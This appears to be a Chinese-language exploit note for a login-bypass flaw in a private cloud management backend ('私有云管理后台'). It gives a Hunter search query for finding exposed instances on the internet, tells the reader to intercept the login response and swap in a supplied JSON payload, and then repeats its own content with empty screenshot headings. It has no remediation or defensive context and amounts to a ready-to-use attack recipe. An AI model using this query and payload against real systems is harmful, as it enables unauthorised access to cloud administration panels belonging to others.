K38-1开源-私有云管理后台-PermissionAC
漏洞描述:
私有云管理平台存在登录绕过漏洞
Hunter语法:
web.title=“私有云管理后台”
漏洞复现:
登陆界面抓包改返回响应的数据
payload:
{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}
效果图:
效果图:
私有云管理平台存在登录绕过漏洞
web.title=“私有云管理后台”
登陆界面抓包改返回响应的数据
payload:
{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}
效果图:
效果图: